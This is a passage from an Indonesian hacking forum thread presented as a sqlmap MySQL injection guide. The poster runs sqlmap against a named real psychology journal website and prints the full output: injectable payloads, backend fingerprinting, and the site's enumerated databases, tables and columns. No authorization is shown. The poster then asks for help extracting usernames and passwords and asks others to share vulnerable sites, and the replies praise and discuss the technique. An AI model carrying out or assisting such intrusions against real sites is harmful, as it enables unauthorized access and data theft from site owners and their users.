Sql-map 0.9 Mysql Injection Guide

[gandeso]

ane coba buat situs http://www.ac-psych.org/index.php?id=1 and dapet

Code:

[14:27:23] [INFO] using '/pentest/database/sqlmap/output/www.ac-psych.org/session' as session file
[14:27:24] [INFO] testing connection to the target url
[14:27:29] [INFO] testing if the url is stable, wait a few seconds
[14:27:31] [INFO] url is stable
[14:27:31] [INFO] testing if GET parameter 'id' is dynamic
[14:27:32] [INFO] confirming that GET parameter 'id' is dynamic
[14:27:34] [INFO] GET parameter 'id' is dynamic
[14:27:35] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[14:27:35] [INFO] testing sql injection on GET parameter 'id'
[14:27:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:27:40] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[14:27:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[14:27:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[14:27:42] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[14:27:43] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[14:27:45] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[14:27:46] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[14:27:47] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[14:27:48] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[14:28:00] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[14:28:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[14:28:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
sqlmap identified the following injection points with a total of 34 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6852=6852

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---

[14:28:30] [INFO] manual usage of GET payloads requires url encoding
[14:28:30] [INFO] testing MySQL
[14:28:31] [INFO] confirming MySQL
[14:28:34] [INFO] the back-end DBMS is MySQL
[14:28:34] [INFO] actively fingerprinting MySQL
[14:28:37] [INFO] executing MySQL comment injection fingerprint
[14:29:55] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request

web application technology: Apache
back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2
               comment injection fingerprint: MySQL 5.0.45
[14:30:04] [INFO] fetching database names
[14:30:04] [INFO] fetching number of databases
[14:30:04] [WARNING] running in a single-thread mode. please consider usage of --threads option to declare higher number of threads
[14:30:04] [INFO] retrieved: 3
[14:30:10] [INFO] retrieved: information_schema
[14:32:31] [INFO] retrieved: ac_psych_org
[14:34:32] [INFO] retrieved: test_natika_pl
available databases [3]:
[*] ac_psych_org
[*] information_schema
[*] test_natika_pl

[14:36:32] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.ac-psych.org'

[*] shutting down at: 14:36:32

root@gandeso-will:/pentest/database/sqlmap# python sqlmap.py --tables -D ac_psych_org -f -u http://www.ac-psych.org/index.php?id=1

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 14:45:00

[14:45:00] [INFO] using '/pentest/database/sqlmap/output/www.ac-psych.org/session' as session file
[14:45:00] [INFO] resuming injection data from session file
[14:45:00] [INFO] resuming back-end DBMS 'mysql 5' from session file
[14:45:00] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6852=6852

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---

[14:45:02] [INFO] manual usage of GET payloads requires url encoding
[14:45:02] [INFO] testing MySQL
[14:45:03] [INFO] confirming MySQL
[14:45:06] [INFO] the back-end DBMS is MySQL
[14:45:06] [INFO] actively fingerprinting MySQL
[14:45:10] [INFO] executing MySQL comment injection fingerprint

web application technology: Apache
back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2
               comment injection fingerprint: MySQL 5.0.45
[14:46:02] [INFO] fetching tables for database: ac_psych_org
[14:46:02] [INFO] fetching number of tables for database 'ac_psych_org'
[14:46:02] [WARNING] running in a single-thread mode. please consider usage of --threads option to declare higher number of threads
[14:46:02] [INFO] retrieved: 15
[14:46:12] [INFO] retrieved: artykuly
[14:47:26] [INFO] retrieved: artykuly_test
[14:48:28] [INFO] retrieved: artykulyspecial
[14:49:46] [INFO] retrieved: artykulyspecial_t[14:51:22] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
est
[14:51:54] [INFO] retrieved: menu
[14:52:44] [INFO] retrieved: menu_nowe
[14:53:38] [INFO] retrieved: menu_nowe_anita
[14:54:43] [INFO] retrieved: menu_nowe_test
[14:55:36] [INFO] retrieved: specialissue
[14:57:19] [INFO] retrieved: specialissue_test
[14:58:38] [INFO] retrieved: specjalizacje
[15:00:07] [INFO] retrieved: subscribe
[15:01:27] [INFO] retrieved: subscribe_test
[15:02:41] [INFO] retrieved: uploadfile
[15:04:20] [INFO] retrieved: uploadfile_tes[15:05:43] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
t
Database: ac_psych_org
[15 tables]
+----------------------+
| artykuly             |
| artykuly_test        |
| artykulyspecial      |
| artykulyspecial_test |
| menu                 |
| menu_nowe            |
| menu_nowe_anita      |
| menu_nowe_test       |
| specialissue         |
| specialissue_test    |
| specjalizacje        |
| subscribe            |
| subscribe_test       |
| uploadfile           |
| uploadfile_test      |
+----------------------+

[15:05:55] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.ac-psych.org'

[*] shutting down at: 15:05:55

root@gandeso-will:/pentest/database/sqlmap# python sqlmap.py -C -T menu -D ac_psych_org -f -u http://www.ac-psych.org/index.php?id=1

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 15:15:02

[15:15:02] [INFO] using '/pentest/database/sqlmap/output/www.ac-psych.org/session' as session file
[15:15:02] [INFO] resuming injection data from session file
[15:15:02] [INFO] resuming back-end DBMS 'mysql 5' from session file
[15:15:08] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6852=6852

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---

[15:15:09] [INFO] manual usage of GET payloads requires url encoding
[15:15:09] [INFO] testing MySQL
[15:15:11] [INFO] confirming MySQL
[15:15:14] [INFO] the back-end DBMS is MySQL
[15:15:14] [INFO] actively fingerprinting MySQL
[15:15:17] [INFO] executing MySQL comment injection fingerprint
[15:16:46] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request

web application technology: Apache
back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2
               comment injection fingerprint: MySQL 5.0.45
[15:17:03] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.ac-psych.org'

[*] shutting down at: 15:17:03

root@gandeso-will:/pentest/database/sqlmap# python sqlmap.py -C -T menu -D ac_psych_org -f -u http://www.ac-psych.org/index.php?id=1

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 15:19:09

[15:19:09] [INFO] using '/pentest/database/sqlmap/output/www.ac-psych.org/session' as session file
[15:19:09] [INFO] resuming injection data from session file
[15:19:09] [INFO] resuming back-end DBMS 'mysql 5' from session file
[15:19:09] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6852=6852

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---

[15:19:11] [INFO] manual usage of GET payloads requires url encoding
[15:19:11] [INFO] testing MySQL
[15:19:13] [INFO] confirming MySQL
[15:19:16] [INFO] the back-end DBMS is MySQL
[15:19:16] [INFO] actively fingerprinting MySQL
[15:19:18] [INFO] executing MySQL comment injection fingerprint

web application technology: Apache
back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2
               comment injection fingerprint: MySQL 5.0.45
[15:20:11] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.ac-psych.org'

[*] shutting down at: 15:20:11

root@gandeso-will:/pentest/database/sqlmap# python sqlmap.py -column -T menu -D ac_psych_org -f -u http://www.ac-psych.org/index.php?id=1

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 15:20:49

[15:20:49] [CRITICAL] unable to read file 'olumn'

[*] shutting down at: 15:20:49

root@gandeso-will:/pentest/database/sqlmap# python sqlmap.py --columns -T menu -D ac_psych_org -f -u http://www.ac-psych.org/index.php?id=1

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 15:21:17

[15:21:18] [INFO] using '/pentest/database/sqlmap/output/www.ac-psych.org/session' as session file
[15:21:18] [INFO] resuming injection data from session file
[15:21:18] [INFO] resuming back-end DBMS 'mysql 5' from session file
[15:21:18] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6852=6852

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---

[15:21:20] [INFO] manual usage of GET payloads requires url encoding
[15:21:20] [INFO] testing MySQL
[15:21:21] [INFO] confirming MySQL
[15:21:24] [INFO] the back-end DBMS is MySQL
[15:21:24] [INFO] actively fingerprinting MySQL
[15:21:27] [INFO] executing MySQL comment injection fingerprint

web application technology: Apache
back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2
               comment injection fingerprint: MySQL 5.0.45
[15:22:20] [INFO] fetching columns for table 'menu' on database 'ac_psych_org'
[15:22:20] [INFO] fetching number of columns for table 'menu' on database 'ac_psych_org'
[15:22:20] [WARNING] running in a single-thread mode. please consider usage of --threads option to declare higher number of threads
[15:22:20] [INFO] retrieved: 10
[15:22:34] [INFO] retrieved: id
[15:23:00] [INFO] retrieved: bigint(20)
[15:24:29] [INFO] retrieved: nazwa
[15:25:19] [INFO] retrieved: varchar(200)
[15:27:03] [INFO] retrieved: extr[15:28:18] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
ako[15:29:20] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
d
[15:29:33] [INFO] retrieved: text
[15:30:17] [INFO] retrieved: opis
[15:31:06] [INFO] retrieved: varchar(200)
[15:33:04] [INFO] retrieved: kod
[15:33:46] [INFO] retrieved: text
[15:34:27] [INFO] retrieved: rodzic
[15:35:30] [INFO] retrieved: bigint(20)
[15:37:22] [INFO] retrieved: popularnosc
[15:39:29] [INFO] retrieved: b[15:40:13] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
igint(2[15:42:21] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
0)
[15:42:42] [INFO] retrieved: minimalnypozi[15:45:59] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
omupr[15:47:26] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
awnien
[15:48:21] [INFO] retrieved: bigint(20)
[15:50:03] [INFO] retrieved: priorytet
[15:51:24] [INFO] retrieved: bigint(20)
[15:52:57] [INFO] retrieved: czas
[15:53:37] [INFO] retrieved: timestamp
Database: ac_psych_org
Table: menu
[10 columns]
+--------------------------+--------------+
| Column                   | Type         |
+--------------------------+--------------+
| czas                     | timestamp    |
| extrakod                 | text         |
| id                       | bigint(20)   |
| kod                      | text         |
| minimalnypoziomuprawnien | bigint(20)   |
| nazwa                    | varchar(200) |
| opis                     | varchar(200) |
| popularnosc              | bigint(20)   |
| priorytet                | bigint(20)   |
| rodzic                   | bigint(20)   |
+--------------------------+--------------+

[15:55:00] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.ac-psych.org'

[*] shutting down at: 15:55:00

ane bingung om, nyari pass sama usernya dengan 3 database,mana koneksinya lemot [curcol]
ane mohon pencerahannya, sekalian bagi2 site yang vuln. terima kasih.

[RieqyNS13]

gan, sql map cuma bisa dijalanin pke terminal linux, klo di Windows gak bisa ?

[gandeso]

(12-19-2011 08:07 AM)RieqyNS13 Wrote:  gan, sql map cuma bisa dijalanin pke terminal linux, klo di Windows gak bisa ?

coba cek lagi di windus biasanya pake cmd, sqlmap juga butuh paket2 python.
ane sih belum coba, entar di share aja di mari kalo ada yang error.
trial and error dulu bro.namanya juga ..

[tunderchrist]

Sumpah ga ngerti saya
Ini udah plajaran mahasiswa ya

[brianfahmi]

Ijin Perkosa Om ;D

[Rohan]

Thanks for the tut

Nice one

[EmpekPLG]

wah keren om wenk ,

[core]

nice share izin pelajari bro

[anko_kum4ru]

(09-15-2011 05:45 PM)p0pc0rn Wrote:  ga juga gitu mas.ada yang sqlmap ga bisa injek web situs.perlu gunakan teknik manual juga.
tp sqlmap antara tools yang bisa bantu dalam sql injection

yupz, ane setuju..
sql map emang keren tapi emang masih ada yg gak bisa diinjek pake sqlmap..
kekuatan seni jari emang mantap..

[bazrezs]

(12-14-2012 03:35 AM)anko_kum4ru Wrote:  

(09-15-2011 05:45 PM)p0pc0rn Wrote:  ga juga gitu mas.ada yang sqlmap ga bisa injek web situs.perlu gunakan teknik manual juga.
tp sqlmap antara tools yang bisa bantu dalam sql injection

yupz, ane setuju..
sql map emang keren tapi emang masih ada yg gak bisa diinjek pake sqlmap..
kekuatan seni jari emang mantap..

kadang web vuln yg kga kebaca di havij di slqmap kebaca slqmap py emang